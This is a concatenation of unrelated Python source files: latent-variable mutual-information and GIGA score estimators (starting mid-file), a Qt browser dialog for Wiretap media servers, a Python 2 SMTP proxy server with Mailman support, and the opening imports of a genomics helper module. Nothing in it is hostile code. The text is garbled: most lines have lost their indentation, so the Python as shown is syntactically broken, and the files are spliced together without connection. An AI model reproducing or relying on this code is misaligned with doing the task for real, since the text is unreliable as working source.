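  Draws `n_samples_z` latents z ~ p(z) and `n_mcmc_x` observations x ~ p(x|z)
  per latent, then estimates I(Z;X) ~= E[log p(x|z) - log p(x)], where
  log p(x) is approximated by logsumexp over z of log p(x|z), minus
  log(n_samples_z).
  """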
log_px_z = []
prog = tqdm(desc='I(Z;X)',
total=n_samples_z * n_mcmc_x,
unit='samples',
disable=not verbose)
for start in range(0, n_samples_z, batch_size):
batch_z = min(n_samples_z - start, batch_size)
z = pz.sample(batch_z)
px_z = fn_px_z(z)
batch_llk = []
for start in range(0, n_mcmc_x, batch_size):
batch_x = min(n_mcmc_x - start, batch_size)
x = px_z.sample(batch_x)
batch_llk.append(px_z.log_prob(x))
prog.update(batch_z * batch_x)
batch_llk = tf.concat(batch_llk, axis=0)
log_px_z.append(batch_llk)
## finalize
prog.clear()
prog.close()
log_px_z = tf.concat(log_px_z, axis=1) # [n_mcmc_x, n_samples_z]
## calculate the MI
log_px = tf.reduce_logsumexp(log_px_z, axis=1, keepdims=True) - \
tf.math.log(tf.cast(n_samples_z, tf.float32))
H_x = tf.reduce_mean(log_px)
  if verbose:
    print('H_x:', H_x)
mi = tf.reduce_mean(log_px_z - log_px)
return mi
def estimate_Izy(X_y: Union[tf.data.Dataset, Generator, Iterator],
fn_qz_x: Callable[[tf.Tensor], tfd.Distribution],
n_samples: int = 10000,
n_mcmc: int = 100,
batch_size: int = 32,
verbose: bool = True):
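  """Sketch (inferred from the implementation below) of the latent/factor
  term I(Z;Y): for each factor i and each of its labels y_k, average
  log q(z|x) over the samples carrying that label (via logsumexp - log K),
  then average over labels and over factors.
  """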
## process the data into mini batches
if not isinstance(X_y, (tf.data.Dataset, Generator, Iterator)):
X, y = X_y
if not isinstance(X, tf.data.Dataset):
X = tf.data.Dataset.from_tensor_slices(X).batch(batch_size)
if not isinstance(y, tf.data.Dataset):
y = tf.data.Dataset.from_tensor_slices(y).batch(batch_size)
X_y = tf.data.Dataset.zip((X, y))
if isinstance(X_y, tf.data.Dataset):
X_y = X_y.repeat(-1).shuffle(1000)
X_y = iter(X_y)
## iterate the dataset until have enough n_samples
count = 0
log_qz_x = []
qy = []
prog = tqdm(desc='I(Z;Y)',
total=n_samples * n_mcmc,
unit='samples',
disable=not verbose)
while count < n_samples:
## step 1: sample q(x, y)
try:
X, y = next(X_y)
except StopIteration:
warnings.warn(f'Not enough data for {n_samples} samples.')
break
batch_x = min(X.shape[0], n_samples - count)
X = X[:batch_x]
y = y[:batch_x]
qy.append(y)
qz_x = fn_qz_x(X)
## step 2: sample q(z|x)
batch_llk_qz = []
for start in range(0, n_mcmc, batch_size):
batch_z = min(n_mcmc - start, batch_size)
z = qz_x.sample(batch_z)
llk_qz = qz_x.log_prob(z)
batch_llk_qz.append(llk_qz)
## update progress
prog.update(batch_z * batch_x)
    ## step 3: aggregate the log-likelihoods
batch_llk_qz = tf.concat(batch_llk_qz, axis=0)
log_qz_x.append(batch_llk_qz)
count += batch_x
## finalizing results
prog.clear()
prog.close()
log_qz_x = tf.concat(log_qz_x, axis=1) # [n_mcmc, n_samples]
qy = tf.concat(qy, axis=0)
## Calculate I(Z; Y) - H(Z)
I_zy = {} # for each factor
n_factors = qy.shape[1]
for i in range(n_factors):
y = np.asarray(qy[:, i], dtype=np.int32)
I_zyi = {} # for each label of the factor
labels = np.unique(y)
for yk in labels:
ids = (y == yk)
K = np.sum(ids)
log_qz_xk = tf.boolean_mask(log_qz_x, ids, axis=1)
log_qz_xk = tf.reduce_logsumexp(log_qz_xk, axis=1) - tf.math.log(
tf.constant(K, dtype=tf.float32))
I_zyi[yk] = tf.reduce_mean(log_qz_xk, axis=0)
# average among labels within a factor
I_zyi = sum(v for v in I_zyi.values()) / len(labels)
I_zy[i] = I_zyi
# average among all factors
I_zy = np.array(list(I_zy.values()))
I_zy = np.mean(I_zy)
  ## I(Z;Y) averaged over factors
return I_zy
def giga(X_y: Union[tf.data.Dataset, Generator, Iterator],
fn_qz_x: Callable[[tf.Tensor], tfd.Distribution],
fn_px_z: Callable[[tf.Tensor], tfd.Distribution],
pz: Optional[tfd.Distribution] = None,
n_samples: int = 10000,
n_mcmc: int = 100,
batch_size: int = 32,
adjusted: bool = True,
verbose: bool = True):
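  """Sketch (inferred from the implementation below) of the GIGA score:
  I(X;Z) + mean_i I(Z;Y_i) / H(Y_i), estimated with `n_mcmc` latent samples
  from q(z|x) for each of `n_samples` observations, using the decoder
  p(x|z) and the prior p(z).
  """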
C_mcmc = tf.math.log(tf.constant(n_mcmc, dtype=tf.float32))
## process the data into mini batches
if not isinstance(X_y, (tf.data.Dataset, Generator, Iterator)):
X, y = X_y
if not isinstance(X, tf.data.Dataset):
X = tf.data.Dataset.from_tensor_slices(X).batch(batch_size)
if not isinstance(y, tf.data.Dataset):
y = tf.data.Dataset.from_tensor_slices(y).batch(batch_size)
X_y = tf.data.Dataset.zip((X, y))
if isinstance(X_y, tf.data.Dataset):
X_y = X_y.repeat(-1).shuffle(1000)
X_y = iter(X_y)
## iterate the dataset until have enough n_samples
count = 0
log_qz_x = []
log_px_z = []
log_pz = []
qy = []
prog = tqdm(desc='GIGA',
total=n_samples * n_mcmc,
unit='samples',
disable=not verbose)
while count < n_samples:
## step 1: sample q(x, y)
try:
X, y = next(X_y)
except StopIteration:
warnings.warn(f'Not enough data for {n_samples} samples.')
break
batch_x = min(X.shape[0], n_samples - count)
X = X[:batch_x]
y = y[:batch_x]
qy.append(y)
qz_x = fn_qz_x(X)
# infer the prior of z
if pz is not None:
pass
elif hasattr(qz_x, 'KL_divergence'):
pz = qz_x.KL_divergence.prior
else:
      pz = tfd.Normal(tf.zeros(qz_x.event_shape, dtype=qz_x.dtype), 1.)
## step 2: sample q(z|x)
batch_llk_px = []
batch_llk_qz = []
batch_llk_pz = []
for start in range(0, n_mcmc, batch_size):
batch_z = min(n_mcmc - start, batch_size)
z = qz_x.sample(batch_z)
llk_qz = qz_x.log_prob(z)
batch_llk_qz.append(llk_qz)
llk_pz = pz.log_prob(z)
batch_llk_pz.append(llk_pz)
z = tf.reshape(z, (-1, z.shape[-1]))
## step 3: calculate log(p(x|z))
px_z = fn_px_z(z)
llk_x = px_z.log_prob(px_z.sample())
llk_x = tf.reshape(llk_x, (batch_z, -1))
batch_llk_px.append(llk_x)
## update progress
prog.update(batch_z * batch_x)
## step 4: aggregate the log-likelihoods
batch_llk_qz = tf.concat(batch_llk_qz, axis=0)
log_qz_x.append(batch_llk_qz)
batch_llk_pz = tf.concat(batch_llk_pz, axis=0)
log_pz.append(batch_llk_pz)
batch_llk_px = tf.concat(batch_llk_px, axis=0)
log_px_z.append(batch_llk_px)
count += batch_x
## finalizing results
prog.clear()
prog.close()
log_px_z = tf.concat(log_px_z, axis=1) # [n_mcmc, n_samples]
log_qz_x = tf.concat(log_qz_x, axis=1) # [n_mcmc, n_samples]
log_pz = tf.concat(log_pz, axis=1) # [n_mcmc, n_samples]
qy = tf.concat(qy, axis=0)
n_factors = qy.shape[1]
## Calculate I(X; Z)
log_pxz = log_px_z + log_pz - log_qz_x
log_px = tf.reduce_logsumexp(log_pxz, axis=0, keepdims=True) - C_mcmc
log_qx = tf.math.log(1. / n_samples)
pxz = tf.math.exp(log_pxz - log_qx)
I_xz = pxz * (log_px_z - log_px) # [n_mcmc, n_samples]
# entropy of x
H_x = tf.reduce_mean(-pxz * log_px)
# entropy of z
H_z = tf.reduce_mean(-tf.math.exp(log_pz - log_qz_x) * log_pz)
I_xz = tf.reduce_mean(I_xz, axis=0) # [n_samples]
# I_xz = I_xz / tf.math.sqrt(H_x * H_z)
I_xz = tf.reduce_mean(I_xz)
## Calculate I(Z; Y) - H(Z)
I_zy = {} # for each factor
for i in range(n_factors):
y = np.asarray(qy[:, i], dtype=np.int32)
I_zyi = {}
labels = np.unique(y)
for yk in labels:
ids = (y == yk)
K = np.sum(ids)
log_qz_xk = tf.boolean_mask(log_qz_x, ids, axis=1)
log_qz_xk = tf.reduce_logsumexp(log_qz_xk, axis=1) - tf.math.log(
tf.constant(K, dtype=tf.float32))
I_zyi[yk] = tf.reduce_mean(log_qz_xk, axis=0)
# average among labels within a factor
I_zyi = sum(v for v in I_zyi.values()) / len(labels)
I_zy[i] = I_zyi
# average among all factors
H_y = np.array([entropy1D(qy[:, i]) for i in range(n_factors)])
I_zy = np.array(list(I_zy.values()))
I_zy = np.mean(I_zy / H_y)
## giga
return I_xz + I_zy
|
|
"""Provides a Qt-based GUI for browsing Wiretap servers and nodes.
@author Brendan Holt
@date May 2014
@todo Implement node creation, deletion, and display filters.
@defgroup modWiretapBrowser WiretapBrowser
@{
"""
import sys
from PySide import QtGui
from wiretap import WireTapClientInit, WireTapClientUninit, WireTapException
import WiretapBrowserUI
from WiretapView import NodeItem
class BrowserDialog(QtGui.QDialog, WiretapBrowserUI.Ui_browserDialog):
"""A dialog window for browsing to a Wiretap \c{CLIP} container node
(either a \c{LIBRARY} or a \c{REEL}) using a tree view of the node
hierarchy.
@details Content such as clip and setup nodes are not shown (disabled in
NodeSelected() and \ref modWiretapView).
"""
def __init__(self, parent=None):
"""Initializes a Wiretap browser dialog.
@param[in] parent \c{(QtGui.QWidget)} The parent widget for this
dialog.
"""
super(BrowserDialog, self).__init__(parent)
self.setupUi(self)
self.nodeTreeView.Populate()
self.nodeItem = None
self.openButton = self.confirmButtonBox.button(
QtGui.QDialogButtonBox.Open)
self.openButton.setEnabled(False)
# Node selection signal-slot
self.__InitTreeSelectionModel()
# Refresh buttons
self.refreshButton.clicked.connect(self.Refresh)
self.refreshAllButton.clicked.connect(self.RefreshAll)
self.pathEdit.textEdited.connect(self.CheckPathFormat)
self.idButton.toggled.connect(self.ToggleNodeID)
#self.pathEdit.setReadOnly(True) # prevent users from wrecking format
def __InitTreeSelectionModel(self):
"""Initializes the item selection model for the tree view and connects
the \c{currentRowChanged} signal to a node selection slot.
"""
selectionModel = QtGui.QItemSelectionModel(self.nodeTreeView.model())
selectionModel.currentRowChanged.connect(self.NodeSelected)
self.nodeTreeView.setSelectionModel(selectionModel)
def IsValidPathFormat(self, text):
"""Checks whether the node path is of the appropriate depth for a
library or reel node and corrects matching hostnames with improper
case.
@param[in] text \c{(str)} The node path from the browser's text box.
@return \c{(bool)} Whether the node path has a valid format.
@todo Implement browsing to the node as you type. However, there can
be significant delays depending on the server selected.
"""
minSegments = 4 # at least HOST/VOLUME/PROJECT/LIBRARY
maxSegments = 5 # at most HOST/VOLUME/PROJECT/LIBRARY/REEL
segments = [seg for seg in text.split('/') if seg]
# Get the hostname from the first segment
try:
hostname = segments[0]
except IndexError:
return False
# Hostname must be in the current list of detected servers and is case-
# sensitive.
try:
fixedHostname = self.FixHostnameCase(hostname)
except ValueError:
return False
# Fix the case of the hostname
if hostname != fixedHostname:
cursorPos = self.pathEdit.cursorPosition()
self.pathEdit.setText(text.replace(hostname, fixedHostname, 1))
self.pathEdit.setCursorPosition(cursorPos)
# TO DO: Browse to node as you type.
#self.nodeTreeView.GoTo(...)
# Too few or too many path segments
if len(segments) < minSegments or len(segments) > maxSegments:
return False
return True
def FixHostnameCase(self, hostname):
"""Fixes a Wiretap hostname that was spelled correctly but may have
improper case.
@details Wiretap hostnames are case-sensitive for initiating server
connections.
@param[in] hostname \c{(str)} The hostname whose case may need fixing.
@throws Raises a <a href="http://docs.python.org/2.6/library/exceptions.html#exceptions.ValueError" target="_blank">
ValueError</a> if the hostname is misspelled.
@return \c{(str)} The corrected hostname.
"""
for hn in self.nodeTreeView.manager.hostnames:
if hostname.lower() == hn.lower():
return hn
raise ValueError("Invalid hostname: " + hostname)
#--------------------------------------------------------------------------
# SLOTS
#--------------------------------------------------------------------------
def NodeSelected(self, current, previous):
"""Updates the node path text box and determines if the current node
is a container type that can be returned.
@details This method is a Qt slot for when a new Wiretap node is
selected in the tree view.
        @param[in] current \c{(QtCore.QModelIndex)} The current row's model
        index.
        @param[in] previous \c{(QtCore.QModelIndex)} The previous row's model
index.
"""
model = current.model()
self.nodeItem = model.itemFromIndex(current)
try: # attempt access on NodeItem attributes
if self.idButton.isChecked():
self.pathEdit.setText(self.nodeItem.nodePath)
else:
self.pathEdit.setText(self.nodeItem.displayPath)
if self.nodeItem.nodeType in NodeItem.CLIP_CONTAINERS:
self.openButton.setEnabled(True)
else:
self.openButton.setEnabled(False)
except AttributeError: # may occasionally select dummy item
pass
def Refresh(self):
"""Refreshes the children of the currently selected node.
@details The collapsed/expanded states of the child nodes will not be
retained. This method is a Qt slot for when the "Refresh"
button is clicked.
"""
if self.nodeItem:
index = self.nodeItem.index()
isExpanded = self.nodeTreeView.isExpanded(index)
try:
self.nodeItem.ResetChildren()
except AttributeError: # probably not a NodeItem
pass
self.nodeTreeView.collapse(index) # hide dummy node
self.nodeTreeView.expand(index) # forces reloading of children
self.nodeTreeView.setExpanded(index, isExpanded) # original state
def RefreshAll(self):
"""Collapses all node trees and refreshes the Wiretap server list.
@details This method is a Qt slot for when the "Refresh All" button is
clicked.
"""
self.nodeTreeView.Reset()
self.__InitTreeSelectionModel()
def CheckPathFormat(self, text):
"""Enables/disables the dialog-accepted ("Open") button depending on
whether the node path has the correct format.
@details This method is a Qt slot for when text is manually edited in
the text box.
@param[in] text \c{(str)} The edited text to be checked.
"""
if self.IsValidPathFormat(text):
self.openButton.setEnabled(True)
else:
self.openButton.setEnabled(False)
def ToggleNodeID(self, checked):
"""Converts a node ID to a display path in the path text box, and vice
versa.
@details If a reel or clip has a blank display name, then consecutive
slashes may appear in portions of the path. When node ID mode
is activated, reels and clips will show up as hash IDs instead
of display names. This method is a Qt slot for when the ID
button is clicked.
@param[in] checked \c{(bool)} Whether the node ID toggle button is in
an activated state.
"""
# Navigate to the current path using the previous node/display path
# style (opposite of checked)
self.nodeTreeView.GoTo(self.pathEdit.text(), not checked)
# When the ID toggle button is activated, make the text bold
        font = self.idButton.font()
        font.setBold(checked)
        self.idButton.setFont(font)
def ChooseContainerNode(parent=None):
"""Launches a Wiretap browser and returns the selected node path.
@param[in] parent \c{(QtGui.QWidget)} The parent widget for this dialog.
@throws Raises a \c{WireTapException} if the Wiretap client failed to
initialize.
@return \c{(str)} The Wiretap server concatenated with the selected node ID
or display path. The result is an empty string if the dialog was
canceled.
"""
if not WireTapClientInit():
raise WireTapException("Unable to initialize the Wiretap client API.")
browser = BrowserDialog(parent)
status = browser.exec_()
WireTapClientUninit()
if status == QtGui.QDialog.Accepted:
return browser.pathEdit.text()
return ''
def SplitNodePath(nodePath):
"""Splits a Wiretap Browser node path into a Wiretap server name and node
ID.
@details A "node path" combines a Wiretap server name and a node ID,
yielding a single string. When splitting a node path, this
function assumes that the text before the first slash is the
server name.
@param[in] nodePath \c{(str)} A non-standard conjunction of the Wiretap
server name and node ID in the form of
\c{HOST:PRODUCT/VOLUME/PROJECT/LIBRARY/[REEL]/CLIP}.
@return \c{(tuple)} The hostname and node ID (the latter always has a
leading slash).
"""
try: # split server from the node ID
hostname, nodeID = nodePath.split('/', 1)
except ValueError: # only the server present
hostname = nodePath
nodeID = ''
return hostname, '/' + nodeID
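# Illustrative example (hypothetical server and volume names):
#     SplitNodePath('flame01:IFFFS/StorageVolume/MyProject/MyLibrary')
# returns ('flame01:IFFFS', '/StorageVolume/MyProject/MyLibrary').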
## @cond TEST
def main():
"""A test harness for launching the Wiretap browser in standalone mode."""
if not WireTapClientInit():
raise WireTapException("Unable to initialize the Wiretap client API.")
app = QtGui.QApplication(sys.argv)
browser = BrowserDialog()
browser.show()
# Cleanup
appStatus = app.exec_()
WireTapClientUninit()
sys.exit(appStatus)
## @endcond
if __name__ == '__main__':
main()
## @}
|
|
#!/app/.heroku/bin/python2.7
"""An RFC 2821 smtp proxy.
Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]
Options:
--nosetuid
-n
This program generally tries to setuid `nobody', unless this flag is
set. The setuid call will fail if this program is not run as root (in
which case, use this flag).
--version
-V
Print the version number and exit.
--class classname
-c classname
Use `classname' as the concrete SMTP proxy class. Uses `PureProxy' by
default.
--debug
-d
Turn on debugging prints.
--help
-h
Print this message and exit.
Version: %(__version__)s
If localhost is not given then `localhost' is used, and if localport is not
given then 8025 is used. If remotehost is not given then `localhost' is used,
and if remoteport is not given, then 25 is used.
"""
# Overview:
#
# This file implements the minimal SMTP protocol as defined in RFC 821. It
# has a hierarchy of classes which implement the backend functionality for the
# smtpd. A number of classes are provided:
#
# SMTPServer - the base class for the backend. Raises NotImplementedError
# if you try to use it.
#
# DebuggingServer - simply prints each message it receives on stdout.
#
# PureProxy - Proxies all messages to a real smtpd which does final
# delivery. One known problem with this class is that it doesn't handle
# SMTP errors from the backend server at all. This should be fixed
# (contributions are welcome!).
#
# MailmanProxy - An experimental hack to work with GNU Mailman
# <www.list.org>. Using this server as your real incoming smtpd, your
# mailhost will automatically recognize and accept mail destined to Mailman
# lists when those lists are created. Every message not destined for a list
# gets forwarded to a real backend smtpd, as with PureProxy. Again, errors
# are not handled correctly yet.
#
# Please note that this script requires Python 2.0
#
# Author: Barry Warsaw <[email protected]>
#
# TODO:
#
# - support mailbox delivery
# - alias files
# - ESMTP
# - handle error codes from the backend smtpd
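# Example (hypothetical ports; assumes this script is saved as smtpd.py):
#
#   python smtpd.py -n -c DebuggingServer localhost:8025 localhost:25
#
# listens on localhost:8025 without dropping privileges and prints each
# received message to stdout instead of relaying it.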
import sys
import os
import errno
import getopt
import time
import socket
import asyncore
import asynchat
__all__ = ["SMTPServer","DebuggingServer","PureProxy","MailmanProxy"]
program = sys.argv[0]
__version__ = 'Python SMTP proxy version 0.2'
class Devnull:
def write(self, msg): pass
def flush(self): pass
DEBUGSTREAM = Devnull()
NEWLINE = '\n'
EMPTYSTRING = ''
COMMASPACE = ', '
def usage(code, msg=''):
print >> sys.stderr, __doc__ % globals()
if msg:
print >> sys.stderr, msg
sys.exit(code)
class SMTPChannel(asynchat.async_chat):
COMMAND = 0
DATA = 1
def __init__(self, server, conn, addr):
asynchat.async_chat.__init__(self, conn)
self.__server = server
self.__conn = conn
self.__addr = addr
self.__line = []
self.__state = self.COMMAND
self.__greeting = 0
self.__mailfrom = None
self.__rcpttos = []
self.__data = ''
self.__fqdn = socket.getfqdn()
try:
self.__peer = conn.getpeername()
except socket.error, err:
# a race condition may occur if the other end is closing
# before we can get the peername
self.close()
if err[0] != errno.ENOTCONN:
raise
return
print >> DEBUGSTREAM, 'Peer:', repr(self.__peer)
self.push('220 %s %s' % (self.__fqdn, __version__))
self.set_terminator('\r\n')
# Overrides base class for convenience
def push(self, msg):
asynchat.async_chat.push(self, msg + '\r\n')
# Implementation of base class abstract method
def collect_incoming_data(self, data):
self.__line.append(data)
# Implementation of base class abstract method
def found_terminator(self):
line = EMPTYSTRING.join(self.__line)
print >> DEBUGSTREAM, 'Data:', repr(line)
self.__line = []
if self.__state == self.COMMAND:
if not line:
self.push('500 Error: bad syntax')
return
method = None
i = line.find(' ')
if i < 0:
command = line.upper()
arg = None
else:
command = line[:i].upper()
arg = line[i+1:].strip()
method = getattr(self, 'smtp_' + command, None)
if not method:
self.push('502 Error: command "%s" not implemented' % command)
return
method(arg)
return
else:
if self.__state != self.DATA:
self.push('451 Internal confusion')
return
# Remove extraneous carriage returns and de-transparency according
# to RFC 821, Section 4.5.2.
data = []
for text in line.split('\r\n'):
if text and text[0] == '.':
data.append(text[1:])
else:
data.append(text)
self.__data = NEWLINE.join(data)
status = self.__server.process_message(self.__peer,
self.__mailfrom,
self.__rcpttos,
self.__data)
self.__rcpttos = []
self.__mailfrom = None
self.__state = self.COMMAND
self.set_terminator('\r\n')
if not status:
self.push('250 Ok')
else:
self.push(status)
# SMTP and ESMTP commands
def smtp_HELO(self, arg):
if not arg:
self.push('501 Syntax: HELO hostname')
return
if self.__greeting:
self.push('503 Duplicate HELO/EHLO')
else:
self.__greeting = arg
self.push('250 %s' % self.__fqdn)
def smtp_NOOP(self, arg):
if arg:
self.push('501 Syntax: NOOP')
else:
self.push('250 Ok')
def smtp_QUIT(self, arg):
# args is ignored
self.push('221 Bye')
self.close_when_done()
# factored
def __getaddr(self, keyword, arg):
address = None
keylen = len(keyword)
if arg[:keylen].upper() == keyword:
address = arg[keylen:].strip()
if not address:
pass
elif address[0] == '<' and address[-1] == '>' and address != '<>':
# Addresses can be in the form <[email protected]> but watch out
# for null address, e.g. <>
address = address[1:-1]
return address
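    # Illustrative behaviour (hypothetical address): __getaddr('FROM:',
    # 'FROM:<[email protected]>') strips the keyword and the angle brackets and
    # returns '[email protected]'; a bare 'FROM:' returns the empty string, and
    # the null sender 'FROM:<>' is returned as '<>' unchanged.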
def smtp_MAIL(self, arg):
print >> DEBUGSTREAM, '===> MAIL', arg
address = self.__getaddr('FROM:', arg) if arg else None
if not address:
self.push('501 Syntax: MAIL FROM:<address>')
return
if self.__mailfrom:
self.push('503 Error: nested MAIL command')
return
self.__mailfrom = address
print >> DEBUGSTREAM, 'sender:', self.__mailfrom
self.push('250 Ok')
def smtp_RCPT(self, arg):
print >> DEBUGSTREAM, '===> RCPT', arg
if not self.__mailfrom:
self.push('503 Error: need MAIL command')
return
address = self.__getaddr('TO:', arg) if arg else None
if not address:
self.push('501 Syntax: RCPT TO: <address>')
return
self.__rcpttos.append(address)
print >> DEBUGSTREAM, 'recips:', self.__rcpttos
self.push('250 Ok')
def smtp_RSET(self, arg):
if arg:
self.push('501 Syntax: RSET')
return
# Resets the sender, recipients, and data, but not the greeting
self.__mailfrom = None
self.__rcpttos = []
self.__data = ''
self.__state = self.COMMAND
self.push('250 Ok')
def smtp_DATA(self, arg):
if not self.__rcpttos:
self.push('503 Error: need RCPT command')
return
if arg:
self.push('501 Syntax: DATA')
return
self.__state = self.DATA
self.set_terminator('\r\n.\r\n')
self.push('354 End data with <CR><LF>.<CR><LF>')
class SMTPServer(asyncore.dispatcher):
def __init__(self, localaddr, remoteaddr):
self._localaddr = localaddr
self._remoteaddr = remoteaddr
asyncore.dispatcher.__init__(self)
try:
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
# try to re-use a server port if possible
self.set_reuse_addr()
self.bind(localaddr)
self.listen(5)
except:
# cleanup asyncore.socket_map before raising
self.close()
raise
else:
print >> DEBUGSTREAM, \
'%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
self.__class__.__name__, time.ctime(time.time()),
localaddr, remoteaddr)
def handle_accept(self):
pair = self.accept()
if pair is not None:
conn, addr = pair
print >> DEBUGSTREAM, 'Incoming connection from %s' % repr(addr)
channel = SMTPChannel(self, conn, addr)
# API for "doing something useful with the message"
def process_message(self, peer, mailfrom, rcpttos, data):
"""Override this abstract method to handle messages from the client.
peer is a tuple containing (ipaddr, port) of the client that made the
socket connection to our smtp port.
mailfrom is the raw address the client claims the message is coming
from.
rcpttos is a list of raw addresses the client wishes to deliver the
message to.
data is a string containing the entire full text of the message,
headers (if supplied) and all. It has been `de-transparencied'
according to RFC 821, Section 4.5.2. In other words, a line
containing a `.' followed by other text has had the leading dot
removed.
This function should return None, for a normal `250 Ok' response;
otherwise it returns the desired response string in RFC 821 format.
"""
raise NotImplementedError
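# A hedged illustration (not part of the original module): the smallest useful
# subclass just overrides process_message; returning None makes the channel
# answer '250 Ok', while returning a string sends that string as the reply.
class _ExampleSinkServer(SMTPServer):
    def process_message(self, peer, mailfrom, rcpttos, data):
        print >> DEBUGSTREAM, 'discarding message from %s to %s' % (
            mailfrom, COMMASPACE.join(rcpttos))
        return None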
class DebuggingServer(SMTPServer):
# Do something with the gathered message
def process_message(self, peer, mailfrom, rcpttos, data):
inheaders = 1
lines = data.split('\n')
print '---------- MESSAGE FOLLOWS ----------'
for line in lines:
# headers first
if inheaders and not line:
print 'X-Peer:', peer[0]
inheaders = 0
print line
print '------------ END MESSAGE ------------'
class PureProxy(SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
lines = data.split('\n')
# Look for the last header
i = 0
for line in lines:
if not line:
break
i += 1
lines.insert(i, 'X-Peer: %s' % peer[0])
data = NEWLINE.join(lines)
refused = self._deliver(mailfrom, rcpttos, data)
# TBD: what to do with refused addresses?
print >> DEBUGSTREAM, 'we got some refusals:', refused
def _deliver(self, mailfrom, rcpttos, data):
import smtplib
refused = {}
try:
s = smtplib.SMTP()
s.connect(self._remoteaddr[0], self._remoteaddr[1])
try:
refused = s.sendmail(mailfrom, rcpttos, data)
finally:
s.quit()
except smtplib.SMTPRecipientsRefused, e:
print >> DEBUGSTREAM, 'got SMTPRecipientsRefused'
refused = e.recipients
except (socket.error, smtplib.SMTPException), e:
print >> DEBUGSTREAM, 'got', e.__class__
# All recipients were refused. If the exception had an associated
            # error code, use it. Otherwise, fake it with a non-triggering
# exception code.
errcode = getattr(e, 'smtp_code', -1)
errmsg = getattr(e, 'smtp_error', 'ignore')
for r in rcpttos:
refused[r] = (errcode, errmsg)
return refused
class MailmanProxy(PureProxy):
def process_message(self, peer, mailfrom, rcpttos, data):
from cStringIO import StringIO
from Mailman import Utils
from Mailman import Message
from Mailman import MailList
# If the message is to a Mailman mailing list, then we'll invoke the
# Mailman script directly, without going through the real smtpd.
# Otherwise we'll forward it to the local proxy for disposition.
listnames = []
for rcpt in rcpttos:
local = rcpt.lower().split('@')[0]
# We allow the following variations on the theme
# listname
# listname-admin
# listname-owner
# listname-request
# listname-join
# listname-leave
parts = local.split('-')
if len(parts) > 2:
continue
listname = parts[0]
if len(parts) == 2:
command = parts[1]
else:
command = ''
if not Utils.list_exists(listname) or command not in (
'', 'admin', 'owner', 'request', 'join', 'leave'):
continue
listnames.append((rcpt, listname, command))
# Remove all list recipients from rcpttos and forward what we're not
# going to take care of ourselves. Linear removal should be fine
# since we don't expect a large number of recipients.
for rcpt, listname, command in listnames:
rcpttos.remove(rcpt)
        # If there are any non-list-destined recipients left,
print >> DEBUGSTREAM, 'forwarding recips:', ' '.join(rcpttos)
if rcpttos:
refused = self._deliver(mailfrom, rcpttos, data)
# TBD: what to do with refused addresses?
print >> DEBUGSTREAM, 'we got refusals:', refused
# Now deliver directly to the list commands
mlists = {}
s = StringIO(data)
msg = Message.Message(s)
# These headers are required for the proper execution of Mailman. All
# MTAs in existence seem to add these if the original message doesn't
# have them.
if not msg.getheader('from'):
msg['From'] = mailfrom
if not msg.getheader('date'):
msg['Date'] = time.ctime(time.time())
for rcpt, listname, command in listnames:
print >> DEBUGSTREAM, 'sending message to', rcpt
mlist = mlists.get(listname)
if not mlist:
mlist = MailList.MailList(listname, lock=0)
mlists[listname] = mlist
# dispatch on the type of command
if command == '':
# post
msg.Enqueue(mlist, tolist=1)
elif command == 'admin':
msg.Enqueue(mlist, toadmin=1)
elif command == 'owner':
msg.Enqueue(mlist, toowner=1)
elif command == 'request':
msg.Enqueue(mlist, torequest=1)
elif command in ('join', 'leave'):
# TBD: this is a hack!
if command == 'join':
msg['Subject'] = 'subscribe'
else:
msg['Subject'] = 'unsubscribe'
msg.Enqueue(mlist, torequest=1)
class Options:
setuid = 1
classname = 'PureProxy'
def parseargs():
global DEBUGSTREAM
try:
opts, args = getopt.getopt(
sys.argv[1:], 'nVhc:d',
['class=', 'nosetuid', 'version', 'help', 'debug'])
except getopt.error, e:
usage(1, e)
options = Options()
for opt, arg in opts:
if opt in ('-h', '--help'):
usage(0)
elif opt in ('-V', '--version'):
print >> sys.stderr, __version__
sys.exit(0)
elif opt in ('-n', '--nosetuid'):
options.setuid = 0
elif opt in ('-c', '--class'):
options.classname = arg
elif opt in ('-d', '--debug'):
DEBUGSTREAM = sys.stderr
# parse the rest of the arguments
if len(args) < 1:
localspec = 'localhost:8025'
remotespec = 'localhost:25'
elif len(args) < 2:
localspec = args[0]
remotespec = 'localhost:25'
elif len(args) < 3:
localspec = args[0]
remotespec = args[1]
else:
usage(1, 'Invalid arguments: %s' % COMMASPACE.join(args))
# split into host/port pairs
i = localspec.find(':')
if i < 0:
usage(1, 'Bad local spec: %s' % localspec)
options.localhost = localspec[:i]
try:
options.localport = int(localspec[i+1:])
except ValueError:
usage(1, 'Bad local port: %s' % localspec)
i = remotespec.find(':')
if i < 0:
usage(1, 'Bad remote spec: %s' % remotespec)
options.remotehost = remotespec[:i]
try:
options.remoteport = int(remotespec[i+1:])
except ValueError:
usage(1, 'Bad remote port: %s' % remotespec)
return options
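# Hedged usage sketch: parseargs() above accepts optional "host:port" specs,
# so an illustrative invocation would be
#   python smtpd.py -n -c DebuggingServer localhost:8025 localhost:25
# which matches the defaults used when no positional arguments are given.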
if __name__ == '__main__':
options = parseargs()
# Become nobody
classname = options.classname
if "." in classname:
lastdot = classname.rfind(".")
mod = __import__(classname[:lastdot], globals(), locals(), [""])
classname = classname[lastdot+1:]
else:
import __main__ as mod
class_ = getattr(mod, classname)
proxy = class_((options.localhost, options.localport),
(options.remotehost, options.remoteport))
if options.setuid:
try:
import pwd
except ImportError:
print >> sys.stderr, \
'Cannot import module "pwd"; try running with -n option.'
sys.exit(1)
nobody = pwd.getpwnam('nobody')[2]
try:
os.setuid(nobody)
except OSError, e:
if e.errno != errno.EPERM: raise
print >> sys.stderr, \
'Cannot setuid "nobody"; try running with -n option.'
sys.exit(1)
try:
asyncore.loop()
except KeyboardInterrupt:
pass
|
|
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A helper module for header inference operations."""
import logging
from typing import Any, Dict, List, Optional, Union # pylint: disable=unused-import
from gcp_variant_transforms.beam_io import vcf_header_io
